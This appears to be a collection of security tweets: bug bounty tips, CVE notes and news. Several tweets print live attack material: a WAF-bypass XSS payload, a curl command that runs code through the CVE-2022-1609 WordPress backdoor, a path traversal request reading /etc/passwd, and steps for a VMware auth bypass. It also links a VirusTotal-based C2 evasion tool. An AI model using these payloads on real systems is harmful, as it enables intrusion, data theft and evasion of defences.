🏹Hunting #PowerShell obfuscation 🔎Monitor suspicious attacks 🎯Detects the relevant incidents Monitor and hunting PowerShell with #AzureSentinel 👇 eshlomo.us/azure-sentinel… #security #informationsecurity #dfir

Multiple WAFs bypass that demonstrates various obfuscation techniques. <sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1//

7 Free Practice Labs to Master GraphQL Attacks 🧵

CVE-2022-1609 WordPress Weblizar Backdoor $ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license' uid=33(www-data) gid=33(www-data) groups=33(www-data) #bugbounty #bugbountytips #nday

Atlassian Jira Seraph Authentication Bypass RCE CVE-2022-0540 raw.githubusercontent.com/Pear1y/CVE-202… #nday #bugbountytips #bugsbunny

Check out zseano's talk "Finding XSS on apple.com and building a proof of concept to leak your PII" from #NahamCon2022! youtu.be/fcAklNSta-U Looking for the rest of the talks? Check out the NahamCon2022 playlist on YouTube! youtube.com/playlist?list=…

CVE-2022-22972 VMWare Workspace One Access Auth Bypass POST /[VictimURL] + "SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1 [Payload data] ... receive cookies in response body Set the HZN cookie in your browser to bypass authentication github.com/horizon3ai/CVE…

.Volexity discovers zero-day exploit impacting all current versions of Atlassian Confluence Server and Data Center. Attackers deploy in-memory Java implant to evade detection. Read more in our latest blog post: volexity.com/blog/2022/06/0… #DFIR #ThreatIntel #InfoSec

How to exploit CSPP (on our early adopter channel) 1) Go to the proxy tab 2) Click Open Browser 3) Pin the extension 4) Enable prototype pollution 5) Visit ginandjuice.shop 6) Open devtools > DOM Invader 7) Scan for gadgets 8) Open devtools > DOM Invader 9) Click exploit

Learn Broken Access Control for Bug Bounty with these resources thexssrat.medium.com/broken-access-… youtu.be/3K1-a7dnA60 youtu.be/hmlkUYJ9MFw youtu.be/2WzqH6N-Gbc youtu.be/Mpw1Lo3GAK0 youtu.be/TJQpOrtet8E youtu.be/EE2N2H3_RnE #bugbounty #bugbountytip #bugbountytips

Quick and easy way to retrieve emails for all git commit authors. There's probably an easier way, but this worked. git log | grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" | sort | uniq -c | sort -nr

kr scan redacted.com/api/v2/ -w routes-large.kite -A=apiroutes-210328:20000 -x 20 -j 1 --fail-status-codes 400,401,404,501,502,426,411 #BugBounty #bugbountytips github.com/assetnote/kite…

- CVE-2022-37299 (Shirne CMS 1.2.0. Path Traversal) Poc: GET /static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test

Uber was hacked. The hacker social engineered an employee -> logged into the VPN and scanned their intranet. 👇

POC for macOS PrivEsc vulnerability CVE-2022-46689 and #YARA rules to detect it POC github.com/zhuowei/MacDir… YARA rules github.com/Neo23x0/signat…

200M Twitter Profiles, with Email Addys, Dumped on Dark Web for Free. 👽 darkreading.com/application-se…

Mitigate the LastPass Attack Surface in Your Environment with this Free Tool. thehackernews.com/2023/01/mitiga…

Abusing VirusTotal API to host our C2 traffic, usefull for bypassing blocking firewall rules if VirusTotal is in the target white list , and in case you don't have C2 infrastructure , now you have a free one github.com/D1rkMtr/VirusT…

Looking for open S3 buckets? Use buckets.grayhatwarfare.com 😊 Tip taken from the amazing writeup mikey96.medium.com/cloud-based-st… mikey96.medium.com/cloud-based-st… made by Mikey credit: Michele Romano #bugbountytips #recon #informationsecurity

What’s covered: • Reflective DLL loading • PowerShell abuse and encoded payloads • EDR evasion: AMSI bypass, API unhooking Tools used: • Volatility 3 (malfind, memory inspection) daniyyell.com/malware%20anal…